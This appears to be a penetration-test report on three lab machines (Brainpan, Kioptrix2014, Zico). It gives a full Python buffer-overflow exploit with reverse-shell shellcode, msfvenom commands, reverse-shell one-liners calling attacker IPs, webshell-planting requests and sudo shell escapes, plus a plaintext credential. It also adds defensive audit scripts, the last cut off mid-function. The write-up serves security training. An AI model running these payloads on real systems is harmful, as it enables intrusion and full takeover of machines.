To exploit Brainpan, a buffer overflow exploit was developed based on a binary that was disclosed via the web server. Once we had successfully developed an exploit for the program on our test system, we used it to gain a shell on the target system. We then break out of the virtual Windows environment and exploit a `sudo` binary to gain command execution as root.

### Service Enumeration

#### Portscan - TCP

```plaintext
PORT      STATE SERVICE REASON  VERSION
9999/tcp  open  abyss?  syn-ack
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data.
```

### Network interfaces

```plaintext
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:da:50:81 brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.138/24 brd 10.0.0.255 scope global eth0
    inet6 fe80::20c:29ff:feda:5081/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: mtu 1500 qdisc noop state DOWN qlen 1000
    link/ether 00:0c:29:da:50:8b brd ff:ff:ff:ff:ff:ff
```

### Credentials

```plaintext
N/A
```

### Exploitation and proof

#### Initial access

##### Vulnerability exploitation

Nmap finds two non-default services. Port 9999 seems to be running a terminal application, but we need a password to access it.

```
# nc 10.0.0.138 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> hello
                          ACCESS DENIED
```

Port 10000 is identified as `SimpleHTTPServer`, and browsing to it, it seems to return a banner image on safe coding practices. Enumerating subfolders on the webserver with `gobuster`, we find `/bin`, which is listable and contains `brainpan.exe`. Let's analyze this application!

```
# gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/bin (Status: 301)
```

We load the binary onto our Windows VM and start fuzzing it. We find that if we send 1000 "A" characters as our password, the application hangs. Inspecting it in our debugger (Immunity Debugger), we find that we have overwritten the stack, including `EIP`!

![a7b7b9d025ee7b2331b0360b7f1a60eb.png](_resources/bd626d2837644bc5908d1a10c044bc61.png)

To find the exact offset, we generate a unique pattern of 1000 characters:

```
msf-pattern_create -l 1000
```

We then send that string as our password, and see that `EIP` is overwritten with the value `35724134`. We can now identify the offset as follows.

```
# msf-pattern_offset -l 1000 -q 35724134
[*] Exact match at offset 524
```

This implies that we *exactly* overwrite `EIP` if we send 524 "A" characters followed by 4 "B" characters. Doing exactly that, we indeed manage to overwrite `EIP` with precision.

![3fccedb5d57ec60e0ed35b3f6b4cf1df.png](_resources/43674b8c9f7f41ea8785d605952406e6.png)

Now, we send an array of the binary characters ranging from `\x01` to `\xff` in our buffer, to identify bad characters. Inspecting the characters in our buffer, none seem to have disappeared or caused issues in the buffer. As such, our only bad character is `\x00`, which we already removed.

Now to generate a payload. For our test system, we generate the following payload. Note that once we deploy it on the target, we need to replace this payload with one generated with a different `LHOST` address.

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.155 LPORT=443 EXITFUNC=thread -f py -b "\x00"
```

This results in a big payload, which we include in our script. We prepend several `\x90` (NOP) characters to ensure the payload is triggered correctly.

Finally, we have to find a `JMP ESP` or `CALL ESP` instruction to instruct the program to actually execute our payload. Using `msf-nasm_shell` to find the respective opcodes, we find that we can use `FFE4` or `FFD4`.

```
# msf-nasm_shell
nasm > jmp esp
00000000  FFE4              jmp esp
nasm > call esp
00000000  FFD4              call esp
```

We can find memory addresses with these instructions in our debugger, using the `mona.py` plugin. First, we run `!mona modules` to identify an unprotected module.

![2917175e6f9be3d4ce5f8045ad575d14.png](_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png)

We find that we can use the binary itself (`brainpan.exe`), since it doesn't have any protections. Using this information, we run the following query to locate `jmp esp` instructions in memory!

```
!mona find -s '\xff\xe4' -m brainpan.exe
```

We find one address: `0x311712f3`. This doesn't contain any bad characters, so it should be usable. We update the `EIP` overwrite in our script to the little-endian notation of that address, which is `"\xf3\x12\x17\x31"`. We are now ready to try our exploit.

Running the exploit on our test machine, we get a shell back!

![20ae0f542aec4372a4ddf58375ea0835.png](_resources/78f9b63a3ff44b8dbddeb34bb174f469.png)

Perfect. Now we only have to re-generate our payload and replace our target IP address to weaponize the exploit.

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.100.108 LPORT=443 EXITFUNC=thread -f py -b "\x00"
```

The final exploit code is as follows:

```python
#!/usr/bin/env python
# Python 2 script: str and bytes are interchangeable, which the buffer
# concatenation below relies on.

import socket

target = "10.0.0.138"
port = 9999

# badchars: \x00

# msfvenom windows/shell_reverse_tcp payload (LHOST=10.0.100.108, LPORT=443)
buf = b""
buf += b"\xbf\xb0\x6b\xdc\x19\xdb\xd7\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x7d\x0e\x03\xcd\x65\x3e"
buf += b"\xec\xd1\x92\x3c\x0f\x29\x63\x21\x99\xcc\x52\x61\xfd"
buf += b"\x85\xc5\x51\x75\xcb\xe9\x1a\xdb\xff\x7a\x6e\xf4\xf0"
buf += b"\xcb\xc5\x22\x3f\xcb\x76\x16\x5e\x4f\x85\x4b\x80\x6e"
buf += b"\x46\x9e\xc1\xb7\xbb\x53\x93\x60\xb7\xc6\x03\x04\x8d"
buf += b"\xda\xa8\x56\x03\x5b\x4d\x2e\x22\x4a\xc0\x24\x7d\x4c"
buf += b"\xe3\xe9\xf5\xc5\xfb\xee\x30\x9f\x70\xc4\xcf\x1e\x50"
buf += b"\x14\x2f\x8c\x9d\x98\xc2\xcc\xda\x1f\x3d\xbb\x12\x5c"
buf += b"\xc0\xbc\xe1\x1e\x1e\x48\xf1\xb9\xd5\xea\xdd\x38\x39"
buf += b"\x6c\x96\x37\xf6\xfa\xf0\x5b\x09\x2e\x8b\x60\x82\xd1"
buf += b"\x5b\xe1\xd0\xf5\x7f\xa9\x83\x94\x26\x17\x65\xa8\x38"
buf += b"\xf8\xda\x0c\x33\x15\x0e\x3d\x1e\x72\xe3\x0c\xa0\x82"
buf += b"\x6b\x06\xd3\xb0\x34\xbc\x7b\xf9\xbd\x1a\x7c\xfe\x97"
buf += b"\xdb\x12\x01\x18\x1c\x3b\xc6\x4c\x4c\x53\xef\xec\x07"
buf += b"\xa3\x10\x39\x87\xf3\xbe\x92\x68\xa3\x7e\x43\x01\xa9"
buf += b"\x70\xbc\x31\xd2\x5a\xd5\xd8\x29\x0d\xd0\x1c\x55\xa1"
buf += b"\x8c\x1e\x95\x38\xf6\x96\x73\x50\x18\xff\x2c\xcd\x81"
buf += b"\x5a\xa6\x6c\x4d\x71\xc3\xaf\xc5\x76\x34\x61\x2e\xf2"
buf += b"\x26\x16\xde\x49\x14\xb1\xe1\x67\x30\x5d\x73\xec\xc0"
buf += b"\x28\x68\xbb\x97\x7d\x5e\xb2\x7d\x90\xf9\x6c\x63\x69"
buf += b"\x9f\x57\x27\xb6\x5c\x59\xa6\x3b\xd8\x7d\xb8\x85\xe1"
buf += b"\x39\xec\x59\xb4\x97\x5a\x1c\x6e\x56\x34\xf6\xdd\x30"
buf += b"\xd0\x8f\x2d\x83\xa6\x8f\x7b\x75\x46\x21\xd2\xc0\x79"
buf += b"\x8e\xb2\xc4\x02\xf2\x22\x2a\xd9\xb6\x43\xc9\xcb\xc2"
buf += b"\xeb\x54\x9e\x6e\x76\x67\x75\xac\x8f\xe4\x7f\x4d\x74"
buf += b"\xf4\x0a\x48\x30\xb2\xe7\x20\x29\x57\x07\x96\x4a\x72"

buffer = "A" * 524               # padding up to the saved return address (offset 524)
buffer += "\xf3\x12\x17\x31"     # 0x311712f3, jmp esp in brainpan.exe, little-endian
buffer += "\x90" * 32 + buf      # NOP sled followed by the payload

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
print(sock.recv(1024))           # read the banner before answering the password prompt
sock.send(buffer)
print(sock.recv(1024))
sock.close()
```

Running the exploit, we get a shell back as user Puck!

##### Severity

`High` - An attacker could identify and exploit this vulnerability to remotely gain code execution on the machine.

##### Remediation

- Patch the `brainpan.exe` binary to properly allocate buffer space and sanitize user inputs
- Limit network access to the machine

##### Proof

![d66c74dd136d44b2e0b8aa1968f8ee6d.png](_resources/3fcfd682f31f487fa15a1e936f6d54e4.png)

#### Privilege Escalation

##### Vulnerability exploitation

Oddly enough, our new shell seems to be on a Linux filesystem, judging by the directories in the root directory. This implies that the Windows binary we found was running via `wine` or a similar emulation environment.

![3fe07241c0b2ef536ff825e501317e50.png](_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png)

To prevent confusion and avoid limitations, we can turn this shell into a regular `sh` shell by spawning a new reverse shell with the regular Linux `sh` binary. For that, we can run the following from our prompt:

```
/bin/sh -i >& /dev/tcp/10.0.0.128/443 0>&1
```

![af1fcd5da95378a05cc417d6491f1509.png](_resources/7bafa472ec614deabdd9cfca82d1119e.png)

On our new shell, we can gain a full TTY as follows.

```
/usr/bin/script -qc /bin/bash /dev/null
```

```
$ sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
```

That seems interesting! We cannot read the binary file to see what it does, so let's just run it.

```
$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
```

Interesting, it looks like we can run some commands as root using this utility. After some playing around, the `manual` command seems to be the most promising. Running this command opens the manpage of a command that we specify, as root.

```
$ sudo /home/anansi/bin/anansi_util manual bash
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
BASH(1)                                                                BASH(1)

NAME
       bash - GNU Bourne-Again SHell

SYNOPSIS
       bash [options] [file]

COPYRIGHT
       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.

DESCRIPTION
       Bash is an sh-compatible command language interpreter that executes
       commands read from the standard input or from a file.  Bash also incor‐
       porates useful features from the Korn and C shells (ksh and csh).

       Bash is intended to be a conformant implementation of the Shell and
       Utilities portion of the IEEE POSIX specification (IEEE Standard
       1003.1).  Bash can be configured to be POSIX-conformant by default.

OPTIONS
       All of the single-character shell options documented in the descrip‐
       tion of the set builtin command can be used as options when the shell
 Manual page bash(1) line 1 (press h for help or q to quit)
```

This isn't too interesting in itself, but we are dropped into an interactive `less`-like prompt since the content doesn't fit on the screen. As listed [here](https://gtfobins.github.io/gtfobins/man/#sudo), we can run system commands by prepending `!`, giving us command execution as root!

Running `!bash` at the manpage prompt drops us into a root shell, giving us full access over the system.

##### Severity

`High` - Any user with sudo permissions on the `anansi_util` binary may escalate their privileges to gain full control of the system.

##### Remediation

- Restrict `sudo` access on a least-privilege basis
- Remove or restrict the `manual` functionality within the `anansi_util` binary

##### Proof

![68784bdfb72a2e608d14a626cd6ed655.png](_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png)

## System IP 10.0.0.139 (Kioptrix2014)

### System overview

|                   |                 |
|-------------------|-----------------|
| IP Address        | 10.0.0.139      |
| Hostname          | Kioptrix2014    |
| Exploitation Date | 04-05-2020      |
| Point Value       | N/A             |

### Exploitation Overview

This machine required several steps to exploit. First, we identify a Local File Inclusion vulnerability in the `pChart` system on the web server. We use this to read the Apache configuration files and identify user-agent based filtering for the web server on port 8080. Once there, we identify the `phptax` application, which we can use to gain command execution as user `www`. Since the machine is running FreeBSD version 9, we utilize a kernel exploit to escalate our privileges to root.
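Before moving into the Kioptrix2014 details, one defender-side check that follows from the Brainpan `sudo -l` finding in the previous section. The script below is an added example and not part of the original report: it parses the "may run the following commands" block of `sudo -l` output (the Brainpan capture is embedded as the sample) and flags NOPASSWD rules that run as root, targets whose basename has a documented shell escape (a small constructed subset of the GTFOBins list, which also covers the `tar` rule abused on Zico later in this report), and custom binaries outside the system directories that need a manual review of what they wrap, as `anansi_util` wraps `man`.

```python
#!/usr/bin/env python3
"""Audit `sudo -l` output for rules that give away more than they appear to.

Added example, not part of the original report. It parses the "User ... may
run the following commands" block of `sudo -l`, then flags:
  * NOPASSWD rules that run as root,
  * targets whose basename is a program with a documented shell escape
    (a small constructed subset of the GTFOBins list),
  * targets that live outside the system binary directories, which need a
    manual review of what they do (Brainpan's anansi_util wraps `man`).
The sample `sudo -l` text is the one captured on Brainpan above.
"""
import os
import re

# Constructed subset: programs whose own prompt or options can spawn a shell.
SHELL_ESCAPE_BINARIES = {"man", "less", "more", "vi", "vim", "tar", "find", "awk"}
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                   "/usr/local/bin/", "/usr/local/sbin/")

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*"      # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"       # NOPASSWD: SETENV: ...
    r"(?P<cmds>\S.*?)\s*$"              # one or more comma-separated commands
)


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per command granted in the 'may run' section."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.lstrip().startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # user part of (user : group)
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(", "):
            rules.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return rules


def audit_sudo_rules(output: str) -> list[str]:
    """Map each risky rule to a short finding string."""
    findings = []
    for rule in parse_sudo_l(output):
        cmd = rule["command"]
        path = cmd.split(" ")[0]         # drop any fixed argument list
        as_root = rule["runas"] in ("root", "ALL")
        if cmd == "ALL" and as_root:
            findings.append(f"{cmd}: unrestricted root")
            continue
        if as_root and "NOPASSWD" in rule["tags"]:
            findings.append(f"{path}: NOPASSWD as root")
        if os.path.basename(path) in SHELL_ESCAPE_BINARIES:
            findings.append(f"{path}: known shell escape")
        if as_root and not path.startswith(SYSTEM_BIN_DIRS):
            findings.append(f"{path}: custom binary run as root, review for shell escapes")
    return findings


# Sample captured on Brainpan (copied from the write-up above).
BRAINPAN_SUDO_L = """\
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
"""

if __name__ == "__main__":
    for finding in audit_sudo_rules(BRAINPAN_SUDO_L):
        print(finding)
```

Run it against `sudo -l -U <user>` for each account during a host review; the two finding types it raises for Brainpan map directly onto the remediation above (least-privilege `sudo`, and removing the `manual` action from the wrapper).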

### Service Enumeration

#### Portscan - TCP

```plaintext
# Nmap 7.80 scan initiated Mon May  4 11:00:08 2020 as: nmap -sV -sC -p- -v -o nmapfull.out 10.0.0.139
Nmap scan report for 10.0.0.139
Host is up (0.00047s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods:
|_  Supported Methods: HEAD
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:FE:67:D7 (VMware)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  4 11:02:18 2020 -- 1 IP address (1 host up) scanned in 129.88 seconds
```

### Network interfaces

```plaintext
em0: flags=8843 metric 0 mtu 1500
	options=9b
	ether 00:0c:29:fe:67:d7
	inet 10.0.0.139 netmask 0xffffff00 broadcast 10.0.0.255
	nd6 options=29
	media: Ethernet autoselect (1000baseT )
	status: active
plip0: flags=8810 metric 0 mtu 1500
	nd6 options=29
lo0: flags=8049 metric 0 mtu 16384
	options=3
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3
	inet 127.0.0.1 netmask 0xff000000
	nd6 options=21
ipfw0: flags=8801 metric 0 mtu 65536
	nd6 options=21
```

### Credentials

```plaintext
N/A
```

### Exploitation and proof

#### Initial access

##### Vulnerability exploitation

Nmap finds two ports open, 80 and 8080. Port 8080 seems to reject all of our requests with a 403 error, and port 80 just returns "It works!". However, by inspecting the source code, we see a reference to `/pChart2.1.3/index.php`.

![ffb80df9362fb3c922d028c49da290b3.png](_resources/5aaf06cbb9f34198ade6738ce59f6c87.png)

Visiting that page, we get to see the pChart system v2.1.3 without authentication. This version seems to be vulnerable to XSS and Path Traversal, as outlined [here](https://www.exploit-db.com/exploits/31173). Testing out the vulnerabilities for ourselves, we can indeed read arbitrary files through the path traversal. For example, we can read `/etc/passwd`.

![3124b1f27f3ccc417fc3881795114ecd.png](_resources/8b57d11edb854ab1af23239e63b089ef.png)

The passwd file also shows that we are dealing with FreeBSD 9, which is interesting since this affects the paths we are dealing with. We can find the HTTP access log here, for example.

```
http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fvar/log/httpd-access.log
```

Unfortunately, any PHP that we inject through user agent poisoning doesn't seem to be executed and is reflected back to us. Looks like we'll have to find another way in. Enumerating more files, we find the Apache configuration.

```
http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
```

Near the bottom, it contains some interesting information about the vhost on port `8080`:

```
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser


    DocumentRoot /usr/local/www/apache22/data2


        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser



```

In short, it sets an environment variable if our user agent begins with "Mozilla/4.0", and only allows us access if the environment variable is set. In other words, we should be able to bypass the 403 errors on that port if we spoof our user agent! Using the Burp Suite proxy, we can easily spoof our user agent with the "Match and Replace" feature.

![642f8dd49c6bded553bc000cdfb8ae0c.png](_resources/158fecfa36214df8b5c347483a9c4cec.png)

We can now access the web port 8080, and find a reference to `phptax`. Clicking the link, we access probably the most interesting system since the start of humanity...

![e3443fadb57f048d5e1a7ee08931f0a1.png](_resources/74774e33076e4483ac3e35d52b3de13b.png)

There are several remote code execution vulnerabilities disclosed for this system, but most don't seem too reliable. We finally end up with [this exploit disclosure](https://www.exploit-db.com/exploits/25849), which simply seems to make one web request to place a PHP backdoor. The exploit itself is slightly unreliable, but we can easily extract and recreate the web request to place the webshell.

```
http://10.0.0.139:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E
```

We can access the webshell at `/phptax/data/rce.php` and inject commands with the `?cmd=` parameter.

![d237d4993fd0e89bce2bcf7740e76c4f.png](_resources/ab39cd6410114eae9114e8c1aeca9a64.png)

Nice! We now have reliable code execution. We can spawn a reverse shell by utilizing the netcat binary as follows: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.128 443 >/tmp/f`. To prevent certain characters from messing up the exploit, we URL-encode the whole payload and visit the following URL to trigger it.

```
http://10.0.0.139:8080/phptax/data/rce.php?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%30%2e%30%2e%31%32%38%20%34%34%33%20%3e%2f%74%6d%70%2f%66
```

Nice, we now have a stable shell as `www`!

![26bfb20bdf976426fa1da426a6115b7e.png](_resources/dc7495e481304f8991d3f2b205ed49f3.png)

##### Severity

`High` - Any user with access to the network this machine is on may be able to read sensitive information and/or remotely exploit the machine.

##### Remediation

- Don't rely on user-agents as a security measure.
- Discontinue or update the `pChart` application.
- Discontinue or update the `phptax` application.

##### Proof

#### Privilege Escalation

##### Vulnerability exploitation

As user `www`, we don't seem to find much that is usable for privilege escalation. Since the system is quite old, let's look for kernel exploits.
554 | 555 | ``` 556 | $ uname -a 557 | FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 558 | ``` 559 | 560 | Looking for exploits for FreeBSD 9, we stumble upon [this exploit](https://www.exploit-db.com/exploits/28718) which seems interesting and relevant for our version. Let's try it out! We grab the source code, transfer it to the target system using `nc`, and compile it using `gcc` on the target (to avoid compiling issues). Running the binary, it drops us into a root shell! Awesome! 561 | 562 | ##### Severity 563 | 564 | `Critical` - Any user on the machine may execute this or similar exploits to gain full control over the machine. 565 | 566 | ##### Remediation 567 | 568 | Patch the operating system to the latest - or at least a more recent - version of FreeBSD. 569 | 570 | ##### Proof 571 | 572 | ![a95dfa6c8b04130cc0e035e71de295b1.png](_resources/2e4416476b68490a8d24e3d7ef51433f.png) 573 | 574 | ### Miscellaneous notes 575 | 576 | The author implemented a nice monitoring feature on the box, confronting with how much noise you make. I generated 35 "level 6" alerts, which would otherwise have had me blocked for 10 minutes each. Phew! 577 | 578 | ![31ca80e6a99a0c083eb47f97fb183b07.png](_resources/d980375a0a284cd699d453a2bb24acbb.png) 579 | 580 | ## System IP 10.0.100.105 (Zico) 581 | 582 | ### System overview 583 | 584 | | | | 585 | |-------------------|-----------------| 586 | | IP Address | 10.0.100.105 | 587 | | Hostname | Zico | 588 | | Exploitation Date | 04-05-2020 | 589 | | Point Value | N/A | 590 | 591 | ### Exploitation Overview 592 | 593 | To exploit this machine we identified `phpLiteAdmin v1.9.3`, which allows us to write arbitrary files to the webserver. We exploit this privilege to write a webshell, which effectively grants us command execution on the server. 
To escalate our privileges, we abuse our sudo rights on the `tar` binary to spawn an interactive shell as root.

#### Portscan - TCP

```plaintext
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 128 OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98r
bT0JW6+Wqa7v0K+N82xf87fVkJcXAuU/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe
9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk
2MHCgxkXl5G/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO/a6T/eQAAAIEAlsW/i/dUuFbRVO2zaAKwL/CFWT19Al7+njszC5FCJ2degg
mF/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p
9x6LxwsDw=
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn/OMDgb
f2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6b
iJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM
0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat
| 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2AT
okB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=
80/tcp open http syn-ack ttl 128 Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind syn-ack ttl 128 2-4 (RPC #100000)
39881/tcp open status syn-ack ttl 128 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Network interfaces

```plaintext
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:e2:b0:d1 brd ff:ff:ff:ff:ff:ff
inet 10.0.100.105/24 brd 10.0.100.255 scope global eth0
inet6 fe80::20c:29ff:fee2:b0d1/64 scope link
valid_lft forever preferred_lft forever
```

### Credentials

```plaintext
zico:sWfCsfJSPV9H3AmQzw8
```

### Exploitation and proof

#### Initial access

##### Vulnerability exploitation

Nmap finds a handful of open ports, of which SSH and HTTP are the most notable. Starting with the HTTP server, we can enumerate several pages and directories on the server.

```
# gobuster dir -u http://10.0.100.105/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -o gobuster.out
[...]
/index (Status: 200)
/index.html (Status: 200)
/img (Status: 301)
/tools (Status: 200)
/tools.html (Status: 200)
/view (Status: 200)
/view.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/package (Status: 200)
/LICENSE (Status: 200)
/less (Status: 301)
/server-status (Status: 403)
/dbadmin (Status: 301)
```

The directory `/dbadmin` looks interesting. It has directory listing enabled, which shows us that `test_db.php` exists in that directory. Here, we can log in with the default password `admin` to find `phpLiteAdmin v1.9.3`. This version has a [known vulnerability](https://www.exploit-db.com/exploits/24044) that allows us to write arbitrary code into PHP files, which then gets executed server-side!

To exploit this vulnerability, we create a new database called `hack.php` and populate it with one table that has one column. We configure this column to have the following default value:

```

```

> Note the double quotes! Single quotes don't work because the payload is already embedded in single quotes by the phpLiteAdmin application.

In the database settings, we see that our simple webshell is written to `/usr/databases/hack.php`. Unfortunately, we cannot access this directory through the web server. We can rename the database to specify a different path.

![53050bc09b2c873bb4e6146f335fb1e5.png](_resources/dedb017ab57246aab374a65165e16d64.png)

Looking at the directory listing in `/dbadmin`, the file seems to have been written correctly! Now we can visit our page to see if the webshell works.

```
# curl http://10.0.100.105/dbadmin/cmd2.php?cmd=id --output -
Wtable11CREATE TABLE '1' ('e' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

In the garbled output we see that our command is interpreted by PHP. Awesome, we have command execution. We send the following request.

```
# curl --output - http://10.0.100.105/dbadmin/cmd2.php?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%30%2e%31%30%38%2f%34%34%33%20%30%3e%26%31%27
```

> This is the command below in URL-encoded format.
>
> ```
> bash -c 'bash -i >& /dev/tcp/10.0.100.108/443 0>&1'
> ```

We now get a shell back as `www-data` on our listener.
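The phpLiteAdmin technique described above leaves a tell-tale artifact on disk: a SQLite database sitting in the web root under a PHP file name, whose schema text carries a PHP open tag. The scan below is an added example and not part of the original report; it builds a constructed web root (directory names, file names and contents are all made up for the example) and flags exactly that kind of file.

```python
"""Flag SQLite database files that double as PHP scripts (added example, not from
the report): the phpLiteAdmin abuse stores a PHP tag as a column default in a database
named hack.php, so the web server runs the SQLite file as PHP. Fixture is constructed."""
import re
import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"          # 16-byte header of every SQLite 3 file
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
PHP_EXTENSIONS = {".php", ".phtml", ".php5"}

def scan_sqlite_for_php(root):
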